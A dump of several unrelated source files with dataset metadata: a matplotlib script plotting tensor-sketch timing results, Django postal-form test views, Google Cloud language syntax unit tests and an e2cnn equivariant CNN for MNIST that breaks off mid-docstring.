cb6cacca8ce9d805a8fd3155b7d29f06537a4c78
| 7,321
|
py
|
Python
|
analysis/make_plots.py
|
mkbera/tensorsketch
|
2be0a51291e32de815c21bff36571480eff0f363
|
[
"MIT"
] | 2
|
2019-11-09T01:32:22.000Z
|
2019-12-11T04:58:11.000Z
|
analysis/make_plots.py
|
mkbera/tensorsketch
|
2be0a51291e32de815c21bff36571480eff0f363
|
[
"MIT"
] | null | null | null |
analysis/make_plots.py
|
mkbera/tensorsketch
|
2be0a51291e32de815c21bff36571480eff0f363
|
[
"MIT"
] | null | null | null |
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import itertools
import math
import os
ttsketch = ['seg', 'cs', 'srht']
vanilla = 'vanilla'
# mode = 'ttsketch'
mode = 'tensorsketch'
N = [
'512',
# '1024',
# '2048',
]
# D = [4, 8, 16, 32, 64]
D = [4, 8]
V = range(20)
P = [2]
TRIALS = range(20)
K = [4**2, 8**2, 16**2, 32**2, 64**2, 128**2, 256**2]
for n, d, p in itertools.product(N, D, P):
sketch_log_folder = '../tensorsketch/log/O3/'
vanilla_log_folder = '../../../data/vanillaLR/log/O3/vanilla/'
x_axis = list(K)
for i in range(len(K)):
x_axis[i] = int(math.sqrt(x_axis[i]))
gamma = []
sigma = []
sigma_approx = []
sigma_sketch = []
for k in K:
opt_time = 0
opt_eval = 0
for v in V:
file_name = 'n_{}_d_{}_p_{}_v_{}.txt'.format(n, d, p, v)
file_path = vanilla_log_folder + file_name
file = open(file_path, 'r').read().split()
opt_time += float(file[0])
opt_eval += float(file[1])
opt_time /= len(V)
opt_eval /= len(V)
sketch_time = 0
approx_time = 0
approx_eval = 0
count = 0
for v, trial in itertools.product(V, TRIALS):
file_name = 'n_{}_d_{}_p_{}_v_{}_k_{}_trial_{}.txt'.format(n, d, p, v, k, trial)
file_path = sketch_log_folder + file_name
file = open(file_path, 'r').read().split()
sketch_time += float(file[0])
approx_time += float(file[1])
approx_eval += float(file[2])
sketch_time /= (len(V) * len(TRIALS))
approx_time /= (len(V) * len(TRIALS))
approx_eval /= (len(V) * len(TRIALS))
gamma.append(approx_eval/opt_eval - 1)
sigma.append((approx_time+sketch_time)/opt_time)
sigma_approx.append(approx_time/opt_time)
sigma_sketch.append(sketch_time/opt_time)
gamma_ttsketch = {}
sigma_ttsketch = {}
sigma_approx_ttsketch = {}
sigma_sketch_ttsketch = {}
for prog in ttsketch:
gamma_ttsketch[prog] = []
sigma_ttsketch[prog] = []
sigma_approx_ttsketch[prog] = []
sigma_sketch_ttsketch[prog] = []
sketch_log_folder = '../../../data/ttsketch/log/O3/{}/'.format(prog)
for k in x_axis:
opt_time = 0
opt_eval = 0
for v in V:
file_name = 'n_{}_d_{}_p_{}_v_{}.txt'.format(n, d, p, v)
file_path = vanilla_log_folder + file_name
file = open(file_path, 'r').read().split()
opt_time += float(file[0])
opt_eval += float(file[1])
opt_time /= len(V)
opt_eval /= len(V)
sketch_time = 0
approx_time = 0
approx_eval = 0
count = 0
for v, trial in itertools.product(V, TRIALS):
file_name = 'n_{}_d_{}_p_{}_v_{}_k_{}_trial_{}.txt'.format(n, d, p, v, k, trial)
file_path = sketch_log_folder + file_name
file = open(file_path, 'r').read().split()
sketch_time += float(file[0])
approx_time += float(file[1])
approx_eval += float(file[2])
sketch_time /= (len(V) * len(TRIALS))
approx_time /= (len(V) * len(TRIALS))
approx_eval /= (len(V) * len(TRIALS))
gamma_ttsketch[prog].append(approx_eval/opt_eval - 1)
sigma_ttsketch[prog].append((approx_time+sketch_time)/opt_time)
sigma_approx_ttsketch[prog].append(approx_time/opt_time)
sigma_sketch_ttsketch[prog].append(sketch_time/opt_time)
try:
os.makedirs('./plots/{}/'.format(mode))
except:
pass
if (mode == 'tensorsketch'):
plt.plot(x_axis, sigma, color='green', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='tensorsketch')
plt.plot(x_axis, sigma_ttsketch['cs'], color='red', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='cs')
if (mode == 'ttsketch'):
plt.plot(x_axis, sigma_ttsketch['srht'], color='blue', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='srht')
plt.plot(x_axis, sigma_ttsketch['seg'], color='pink', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='seg')
plt.ylim(0, 3.0)
plt.xlabel('K: sketch rows')
plt.ylabel('sigma: time/time')
plt.title('n_{}_d_{}_p_{}'.format(n, d, p))
plt.legend()
plt.savefig('./plots/{}/'.format(mode) + 'sigma:n_{}_d_{}_p_{}.png'.format(n, d, p))
plt.clf()
if (mode == 'tensorsketch'):
plt.plot(x_axis, sigma_approx, color='green', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='tensorsketch')
plt.plot(x_axis, sigma_approx_ttsketch['cs'], color='red', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='cs')
if (mode == 'ttsketch'):
plt.plot(x_axis, sigma_approx_ttsketch['srht'], color='blue', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='srht')
plt.plot(x_axis, sigma_approx_ttsketch['seg'], color='pink', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='seg')
plt.ylim(0, 3.0)
plt.xlabel('K: sketch rows')
plt.ylabel('sigma_approx: time/time')
plt.title('n_{}_d_{}_p_{}'.format(n, d, p))
plt.legend()
plt.savefig('./plots/{}/'.format(mode) + 'sigma_approx:n_{}_d_{}_p_{}.png'.format(n, d, p))
plt.clf()
if (mode == 'tensorsketch'):
plt.plot(x_axis, sigma_sketch, color='green', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='tensorsketch')
plt.plot(x_axis, sigma_sketch_ttsketch['cs'], color='red', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='cs')
if (mode == 'ttsketch'):
print(sigma_sketch_ttsketch['srht'], 'mark')
plt.plot(x_axis, sigma_sketch_ttsketch['srht'], color='blue', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='srht')
plt.plot(x_axis, sigma_sketch_ttsketch['seg'], color='pink', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='seg')
plt.ylim(0, 3.0)
plt.xlabel('K: sketch rows')
plt.ylabel('sigma_sketch: time/time')
plt.title('n_{}_d_{}_p_{}'.format(n, d, p))
plt.legend()
plt.savefig('./plots/{}/'.format(mode) + 'sigma_sketch:n_{}_d_{}_p_{}.png'.format(n, d, p))
plt.clf()
if (mode == 'tensorsketch'):
plt.plot(x_axis, gamma, color='green', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='tensorsketch')
plt.plot(x_axis, gamma_ttsketch['cs'], color='red', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='cs')
if (mode == 'ttsketch'):
plt.plot(x_axis, gamma_ttsketch['srht'], color='blue', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='srht')
plt.plot(x_axis, gamma_ttsketch['seg'], color='pink', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='seg')
plt.ylim(0, 0.2)
plt.xlabel('K: sketch rows')
plt.ylabel('gamma: eval/eval - 1')
plt.title('n_{}_d_{}_p_{}'.format(n, d, p))
plt.legend()
plt.savefig('./plots/{}/'.format(mode) + 'gamma:n_{}_d_{}_p_{}.png'.format(n, d, p))
plt.clf()
| 38.941489
| 100
| 0.627783
| 1,042
| 7,321
| 4.197697
| 0.102687
| 0.011888
| 0.017833
| 0.043896
| 0.826246
| 0.810242
| 0.80567
| 0.755373
| 0.747371
| 0.727252
| 0
| 0.01982
| 0.179893
| 7,321
| 188
| 101
| 38.941489
| 0.708694
| 0.007786
| 0
| 0.541667
| 0
| 0
| 0.152128
| 0.045949
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.005952
| 0.029762
| 0
| 0.029762
| 0.005952
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1df73698a1d13a279004ced94fe8290ef40143dc
| 1,624
|
py
|
Python
|
postal_project/views.py
|
michael-hahn/django-postal
|
082000839b20a8ee0aeaa6f8c76cc459409310e4
|
[
"MIT"
] | 6
|
2015-01-07T10:01:00.000Z
|
2020-03-23T21:28:12.000Z
|
postal_project/views.py
|
michael-hahn/django-postal
|
082000839b20a8ee0aeaa6f8c76cc459409310e4
|
[
"MIT"
] | 5
|
2015-02-24T08:09:16.000Z
|
2015-11-25T10:02:07.000Z
|
postal_project/views.py
|
michael-hahn/django-postal
|
082000839b20a8ee0aeaa6f8c76cc459409310e4
|
[
"MIT"
] | 8
|
2015-01-30T05:49:54.000Z
|
2021-08-17T22:06:33.000Z
|
from django import forms
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from postal.library import country_map
from postal.forms import PostalAddressForm
def test_postal(request):
countries = []
for k,v in country_map.items():
countries.append(k)
result = ""
if request.method == "POST":
form = PostalAddressForm(request.POST, prefix=request.POST.get('prefix', ''))
if form.is_valid():
for k,v in form.cleaned_data.items():
result = result + k + " -> " + v + "<br/>"
context = RequestContext(request, locals())
return render_to_response('postal/test.html', context)
else:
form = PostalAddressForm() # An unbound form
context = RequestContext(request, locals())
return render_to_response('postal/test.html', context)
def test_postal_json(request):
countries = []
for k,v in country_map.items():
countries.append(k)
result = ""
if request.method == "POST":
form = PostalAddressForm(request.POST, prefix=request.POST.get('prefix', ''))
if form.is_valid():
for k,v in form.cleaned_data.items():
result = result + k + " -> " + v + "<br/>"
context = RequestContext(request, locals())
return render_to_response('postal/test.html', context)
else:
form = PostalAddressForm() # An unbound form
context = RequestContext(request, locals())
return render_to_response('postal/test_json.html', context)
| 35.304348
| 85
| 0.637931
| 186
| 1,624
| 5.456989
| 0.252688
| 0.011823
| 0.078818
| 0.027586
| 0.747783
| 0.747783
| 0.747783
| 0.747783
| 0.747783
| 0.747783
| 0
| 0
| 0.244458
| 1,624
| 46
| 86
| 35.304348
| 0.827221
| 0.019089
| 0
| 0.763158
| 0
| 0
| 0.067253
| 0.013199
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.157895
| 0
| 0.315789
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6974603d0606b0570d54852a9a8515815ba88da1
| 147
|
py
|
Python
|
common/__init__.py
|
Chenhuping/flask-restful-example
|
8ddbca623e80684ea7fd9fce851b2c9251601dcc
|
[
"MIT"
] | 1
|
2019-06-27T01:03:38.000Z
|
2019-06-27T01:03:38.000Z
|
common/__init__.py
|
Chenhuping/flask-restful-example
|
8ddbca623e80684ea7fd9fce851b2c9251601dcc
|
[
"MIT"
] | null | null | null |
common/__init__.py
|
Chenhuping/flask-restful-example
|
8ddbca623e80684ea7fd9fce851b2c9251601dcc
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from .code import Code, CODE_MSG_MAP
from .utils import pretty_result
__all__ = ['Code', 'CODE_MSG_MAP', 'pretty_result']
| 24.5
| 51
| 0.707483
| 22
| 147
| 4.272727
| 0.545455
| 0.170213
| 0.234043
| 0.297872
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007874
| 0.136054
| 147
| 5
| 52
| 29.4
| 0.732283
| 0.142857
| 0
| 0
| 0
| 0
| 0.233871
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
69950aaf6ddba01b5fdb2f466cc25a58c80cf310
| 54
|
py
|
Python
|
Chap02_Multi_Armed_Bandit/gym_n_bandit/envs/__init__.py
|
quangnguyendang/Reinforcement_Learning
|
2551ce95068561c553500838ee6b976f001ba667
|
[
"MIT"
] | null | null | null |
Chap02_Multi_Armed_Bandit/gym_n_bandit/envs/__init__.py
|
quangnguyendang/Reinforcement_Learning
|
2551ce95068561c553500838ee6b976f001ba667
|
[
"MIT"
] | null | null | null |
Chap02_Multi_Armed_Bandit/gym_n_bandit/envs/__init__.py
|
quangnguyendang/Reinforcement_Learning
|
2551ce95068561c553500838ee6b976f001ba667
|
[
"MIT"
] | null | null | null |
from gym_n_bandit.envs.n_bandit_env import NBanditEnv
| 27
| 53
| 0.888889
| 10
| 54
| 4.4
| 0.8
| 0.318182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 54
| 1
| 54
| 54
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
69a5950eaf3d0a3e94508f1c9771460a312356ef
| 122
|
py
|
Python
|
Section08_Composite/Practice/ManyValues.py
|
enriqueescobar-askida/Kinito.Python
|
e4c5521e771c4de0ceaf81776a4a61f7de01edb4
|
[
"MIT"
] | 1
|
2020-10-20T07:41:51.000Z
|
2020-10-20T07:41:51.000Z
|
Section08_Composite/Practice/ManyValues.py
|
enriqueescobar-askida/Kinito.Python
|
e4c5521e771c4de0ceaf81776a4a61f7de01edb4
|
[
"MIT"
] | null | null | null |
Section08_Composite/Practice/ManyValues.py
|
enriqueescobar-askida/Kinito.Python
|
e4c5521e771c4de0ceaf81776a4a61f7de01edb4
|
[
"MIT"
] | null | null | null |
from Section08_Composite.Practice.ValueContainer import ValueContainer
class ManyValues(list, ValueContainer):
pass
| 20.333333
| 70
| 0.836066
| 12
| 122
| 8.416667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018519
| 0.114754
| 122
| 5
| 71
| 24.4
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
387257353ccbc1f078976024c28726a2c8f9a7ea
| 8,614
|
py
|
Python
|
language/tests/unit/test_syntax.py
|
rodrigodias27/google-cloud-python
|
7d1161f70744c0dbbe67a3f472ea95667eaafe50
|
[
"Apache-2.0"
] | null | null | null |
language/tests/unit/test_syntax.py
|
rodrigodias27/google-cloud-python
|
7d1161f70744c0dbbe67a3f472ea95667eaafe50
|
[
"Apache-2.0"
] | null | null | null |
language/tests/unit/test_syntax.py
|
rodrigodias27/google-cloud-python
|
7d1161f70744c0dbbe67a3f472ea95667eaafe50
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
class TestPartOfSpeech(unittest.TestCase):
@staticmethod
def _get_target_class():
from google.cloud.language.syntax import PartOfSpeech
return PartOfSpeech
def test_reverse(self):
klass = self._get_target_class()
for attr in dir(klass):
if attr.startswith('_'):
continue
if attr.islower():
continue
value = getattr(klass, attr)
result = klass.reverse(value)
self.assertEqual(result, attr)
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_constructor(self):
aspect = 'ASPECT_UNKNOWN'
reciprocity = 'RECIPROCITY_UNKNOWN'
case = 'NOMINATIVE'
mood = 'MOOD_UNKNOWN'
tag = 'PRON'
person = 'FIRST'
number = 'SINGULAR'
tense = 'TENSE_UNKNOWN'
form = 'FORM_UNKNOWN'
proper = 'PROPER_UNKNOWN'
voice = 'VOICE_UNKNOWN'
gender = 'GENDER_UNKNOWN'
pos = self._make_one(aspect, reciprocity, case, mood, tag, person,
number, tense, form, proper, voice, gender)
self.assertEqual(pos.aspect, aspect)
self.assertEqual(pos.reciprocity, reciprocity)
self.assertEqual(pos.case, case)
self.assertEqual(pos.mood, mood)
self.assertEqual(pos.tag, tag)
self.assertEqual(pos.person, person)
self.assertEqual(pos.number, number)
self.assertEqual(pos.tense, tense)
self.assertEqual(pos.form, form)
self.assertEqual(pos.proper, proper)
self.assertEqual(pos.voice, voice)
self.assertEqual(pos.gender, gender)
def test_from_api_repr(self):
klass = self._get_target_class()
aspect = 'ASPECT_UNKNOWN'
reciprocity = 'RECIPROCITY_UNKNOWN'
case = 'NOMINATIVE'
mood = 'MOOD_UNKNOWN'
tag = 'PRON'
person = 'FIRST'
number = 'SINGULAR'
tense = 'TENSE_UNKNOWN'
form = 'FORM_UNKNOWN'
proper = 'PROPER_UNKNOWN'
voice = 'VOICE_UNKNOWN'
gender = 'GENDER_UNKNOWN'
payload = {
'aspect': aspect,
'reciprocity': reciprocity,
'case': case,
'mood': mood,
'tag': tag,
'person': person,
'number': number,
'tense': tense,
'form': form,
'proper': proper,
'voice': voice,
'gender': gender
}
pos = klass.from_api_repr(payload)
self.assertEqual(pos.aspect, aspect)
self.assertEqual(pos.reciprocity, reciprocity)
self.assertEqual(pos.case, case)
self.assertEqual(pos.mood, mood)
self.assertEqual(pos.tag, tag)
self.assertEqual(pos.person, person)
self.assertEqual(pos.number, number)
self.assertEqual(pos.tense, tense)
self.assertEqual(pos.form, form)
self.assertEqual(pos.proper, proper)
self.assertEqual(pos.voice, voice)
self.assertEqual(pos.gender, gender)
class TestToken(unittest.TestCase):
@staticmethod
def _get_target_class():
from google.cloud.language.syntax import Token
return Token
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_constructor(self):
from google.cloud.language.syntax import PartOfSpeech
text_content = 'All'
text_begin = -1
aspect = 'ASPECT_UNKNOWN'
reciprocity = 'RECIPROCITY_UNKNOWN'
case = 'NOMINATIVE'
mood = 'MOOD_UNKNOWN'
tag = 'PRON'
person = 'FIRST'
number = 'SINGULAR'
tense = 'TENSE_UNKNOWN'
form = 'FORM_UNKNOWN'
proper = 'PROPER_UNKNOWN'
voice = 'VOICE_UNKNOWN'
gender = 'GENDER_UNKNOWN'
part_of_speech = PartOfSpeech(aspect, reciprocity, case, mood, tag, person,
number, tense, form, proper, voice, gender)
edge_index = 3
edge_label = 'PREDET'
lemma = text_content
token = self._make_one(text_content, text_begin, part_of_speech,
edge_index, edge_label, lemma)
self.assertEqual(token.text_content, text_content)
self.assertEqual(token.text_begin, text_begin)
self.assertEqual(token.part_of_speech.aspect, part_of_speech.aspect)
self.assertEqual(token.part_of_speech.reciprocity, part_of_speech.reciprocity)
self.assertEqual(token.part_of_speech.case, part_of_speech.case)
self.assertEqual(token.part_of_speech.mood, part_of_speech.mood)
self.assertEqual(token.part_of_speech.tag, part_of_speech.tag)
self.assertEqual(token.part_of_speech.person, part_of_speech.person)
self.assertEqual(token.part_of_speech.number, part_of_speech.number)
self.assertEqual(token.part_of_speech.tense, part_of_speech.tense)
self.assertEqual(token.part_of_speech.form, part_of_speech.form)
self.assertEqual(token.part_of_speech.proper, part_of_speech.proper)
self.assertEqual(token.part_of_speech.voice, part_of_speech.voice)
self.assertEqual(token.part_of_speech.gender, part_of_speech.gender)
self.assertEqual(token.edge_index, edge_index)
self.assertEqual(token.edge_label, edge_label)
self.assertEqual(token.lemma, lemma)
def test_from_api_repr(self):
klass = self._get_target_class()
text_content = 'pretty'
text_begin = -1
aspect = 'ASPECT_UNKNOWN'
reciprocity = 'RECIPROCITY_UNKNOWN'
case = 'NOMINATIVE'
mood = 'MOOD_UNKNOWN'
tag = 'PRON'
person = 'FIRST'
number = 'SINGULAR'
tense = 'TENSE_UNKNOWN'
form = 'FORM_UNKNOWN'
proper = 'PROPER_UNKNOWN'
voice = 'VOICE_UNKNOWN'
gender = 'GENDER_UNKNOWN'
part_of_speech = {
'aspect': aspect,
'reciprocity': reciprocity,
'case': case,
'mood': mood,
'tag': tag,
'person': person,
'number': number,
'tense': tense,
'form': form,
'proper': proper,
'voice': voice,
'gender': gender
}
edge_index = 3
edge_label = 'AMOD'
lemma = text_content
payload = {
'text': {
'content': text_content,
'beginOffset': text_begin,
},
'partOfSpeech': part_of_speech,
'dependencyEdge': {
'headTokenIndex': edge_index,
'label': edge_label,
},
'lemma': lemma,
}
token = klass.from_api_repr(payload)
self.assertEqual(token.text_content, text_content)
self.assertEqual(token.text_begin, text_begin)
self.assertEqual(token.part_of_speech.aspect, part_of_speech['aspect'])
self.assertEqual(token.part_of_speech.reciprocity, part_of_speech['reciprocity'])
self.assertEqual(token.part_of_speech.case, part_of_speech['case'])
self.assertEqual(token.part_of_speech.mood, part_of_speech['mood'])
self.assertEqual(token.part_of_speech.tag, part_of_speech['tag'])
self.assertEqual(token.part_of_speech.person, part_of_speech['person'])
self.assertEqual(token.part_of_speech.number, part_of_speech['number'])
self.assertEqual(token.part_of_speech.tense, part_of_speech['tense'])
self.assertEqual(token.part_of_speech.form, part_of_speech['form'])
self.assertEqual(token.part_of_speech.proper, part_of_speech['proper'])
self.assertEqual(token.part_of_speech.voice, part_of_speech['voice'])
self.assertEqual(token.part_of_speech.gender, part_of_speech['gender'])
self.assertEqual(token.edge_index, edge_index)
self.assertEqual(token.edge_label, edge_label)
self.assertEqual(token.lemma, lemma)
| 37.947137
| 89
| 0.623868
| 966
| 8,614
| 5.34265
| 0.141822
| 0.171478
| 0.120907
| 0.111606
| 0.809146
| 0.809146
| 0.796551
| 0.776206
| 0.776206
| 0.776206
| 0
| 0.001921
| 0.274901
| 8,614
| 226
| 90
| 38.115044
| 0.824368
| 0.063617
| 0
| 0.688776
| 0
| 0
| 0.10457
| 0
| 0
| 0
| 0
| 0
| 0.30102
| 1
| 0.045918
| false
| 0
| 0.020408
| 0.010204
| 0.096939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2a2877c68062c50e71a4299f0bbd89c7a8d70464
| 11,831
|
py
|
Python
|
advbench/models/e2_mnist.py
|
constrainedlearning/advbench
|
68f9f6d77268aad45517ca84d383b996724cc976
|
[
"MIT"
] | null | null | null |
advbench/models/e2_mnist.py
|
constrainedlearning/advbench
|
68f9f6d77268aad45517ca84d383b996724cc976
|
[
"MIT"
] | null | null | null |
advbench/models/e2_mnist.py
|
constrainedlearning/advbench
|
68f9f6d77268aad45517ca84d383b996724cc976
|
[
"MIT"
] | null | null | null |
from e2cnn.nn import *
from e2cnn.gspaces import *
import torch
import torch.nn as nn
import numpy as np
## MNIST
class E2SFCNN_QUOT(torch.nn.Module):
def __init__(self, n_channels, n_classes,
N=16,
restrict: int = -1,
fix_param: bool = True,
fco: float = None,
p_drop_fully: float = 0.3,
J: int = 0,
sigma: float = None,
sgsize: int = None,
flip: bool = False,
):
super(E2SFCNN_QUOT, self).__init__()
if N is None:
N = 16
assert N > 1
self.N = N
self.n_channels = n_channels
self.n_classes = n_classes
# build the group O(2) or D_N depending on the number N of rotations specified
if N > 1:
self.gspace = FlipRot2dOnR2(N)
elif N == 1:
self.gspace = Flip2dOnR2()
else:
raise ValueError(N)
# if flips are not required, immediately restrict to the SO(2) or C_N subgroup
if not flip:
if N != 1:
sg = (None, N)
else:
sg = 1
self.gspace, _, _ = self.gspace.restrict(sg)
# id of the subgroup if group restriction is applied through the network
if sgsize is not None:
self.sgid = sgsize
else:
self.sgid = N
if flip and N != 1:
self.sgid = (None, self.sgid)
if fco is not None and fco > 0.:
fco *= np.pi
self.frequencies_cutoff = fco
self.sigma = sigma
self.J = J
self.fix_param = fix_param
self.restrict = restrict
eq_layers = []
self.LAYER = 0
if restrict == self.LAYER:
gspace, _, _ = self.gspace.restrict(self.sgid)
r1 = FieldType(gspace, [gspace.trivial_repr] * n_channels)
# 28 px
# Convolutional Layer 1
self.LAYER += 1
eq_layers += self.build_layer_quotient(r1, 24, 9, 0, None)
# Convolutional Layer 2
self.LAYER += 1
eq_layers += self.build_layer_quotient(eq_layers[-1].out_type, 32, 7, 3, 2)
# 14 px
# Convolutional Layer 3
self.LAYER += 1
eq_layers += self.build_layer_quotient(eq_layers[-1].out_type, 36, 7, 3, None)
# Convolutional Layer 4
self.LAYER += 1
eq_layers += self.build_layer_quotient(eq_layers[-1].out_type, 36, 7, 3, 2)
# 7 px
# Convolutional Layer 5
self.LAYER += 1
eq_layers += self.build_layer_quotient(eq_layers[-1].out_type, 64, 7, 3)
# Convolutional Layer 6
self.LAYER += 1
eq_layers += self.build_layer_quotient(eq_layers[-1].out_type, 96, 5, 0, None, True)
# Adaptive Pooling
mpl = PointwiseAdaptiveMaxPool(eq_layers[-1].out_type, 1)
eq_layers.append(mpl)
# 1 px
# c = 96
c = eq_layers[-1].out_type.size
self.in_repr = eq_layers[0].in_type
self.eq_layers = torch.nn.ModuleList(eq_layers)
# Fully Connected
self.fully_net = nn.Sequential(
nn.Dropout(p=p_drop_fully),
nn.Linear(c, 96),
nn.BatchNorm1d(96),
nn.ELU(inplace=True),
nn.Dropout(p=p_drop_fully),
nn.Linear(96, 96),
nn.BatchNorm1d(96),
nn.ELU(inplace=True),
nn.Dropout(p=p_drop_fully),
nn.Linear(96, n_classes),
)
def forward(self, input: torch.tensor):
x = GeometricTensor(input, self.in_repr)
for layer in self.eq_layers:
x = layer(x)
x = self.fully_net(x.tensor.reshape(x.tensor.shape[0], -1))
return x
def build_quotient_feature_type(self, gspace):
assert gspace.fibergroup.order() > 0
if isinstance(gspace, FlipRot2dOnR2):
n = int(gspace.fibergroup.order() / 2)
repr = [gspace.regular_repr] * 5
for i in [0, round(n / 4), round(n / 2)]:
repr += [gspace.quotient_repr((int(i), 1))] * 2
repr += [gspace.quotient_repr((None, int(n / 2)))] * 2
repr += [gspace.trivial_repr] * int(gspace.fibergroup.order() / 4)
elif isinstance(gspace, Rot2dOnR2):
n = gspace.fibergroup.order()
repr = [gspace.regular_repr] * 5
repr += [gspace.quotient_repr(int(round(n / 2)))] * 2
repr += [gspace.quotient_repr(int(round(n / 4)))] * 2
repr += [gspace.trivial_repr] * int(gspace.fibergroup.order() / 4)
else:
repr = [gspace.regular_repr]
return repr
def build_layer_quotient(self, r1: FieldType, C: int, s: int, padding: int = 0, pooling: int = None,
orientation_pooling: bool = False):
gspace = r1.gspace
if self.fix_param and not orientation_pooling and self.LAYER > 1:
# to keep number of parameters more or less constant when changing groups
# (more precisely, we try to keep them close to the number of parameters in the original SFCNN)
t = gspace.fibergroup.order() / 16
C = C / np.sqrt(t)
layers = []
repr = self.build_quotient_feature_type(gspace)
C /= sum([r.size for r in repr]) / gspace.fibergroup.order()
C = int(round(C))
r2 = FieldType(gspace, repr * C).sorted()
cl = R2Conv(r1, r2, s,
frequencies_cutoff=self.frequencies_cutoff,
padding=padding,
sigma=self.sigma,
maximum_offset=self.J)
layers.append(cl)
if self.restrict == self.LAYER:
layers.append(RestrictionModule(layers[-1].out_type, self.sgid))
layers.append(DisentangleModule(layers[-1].out_type))
if orientation_pooling:
pl = GroupPooling(layers[-1].out_type)
layers.append(pl)
bn = InnerBatchNorm(layers[-1].out_type)
layers.append(bn)
nnl = ELU(layers[-1].out_type, inplace=True)
layers.append(nnl)
if pooling is not None:
pl = PointwiseMaxPool(layers[-1].out_type, pooling)
layers.append(pl)
return layers
class E2SFCNN(torch.nn.Module):
    """E(2)-equivariant steerable CNN (SFCNN variant) using regular-representation fields.

    Six equivariant conv blocks followed by adaptive max pooling and a
    conventional fully-connected classification head.
    """

    def __init__(self, n_channels, n_classes,
                 N=16,
                 restrict: int = -1,
                 fix_param: bool = True,
                 fco: float = None,
                 p_drop_fully: float = 0.3,
                 J: int = 0,
                 sigma: float = None,
                 sgsize: int = None,
                 flip: bool = False,
                 ):
        """Build the network.

        :param n_channels: number of input image channels
        :param n_classes: number of output classes
        :param N: number of discrete rotations (None defaults to 16)
        :param restrict: index of the layer at which to restrict to the ``sgid`` subgroup (-1 = never)
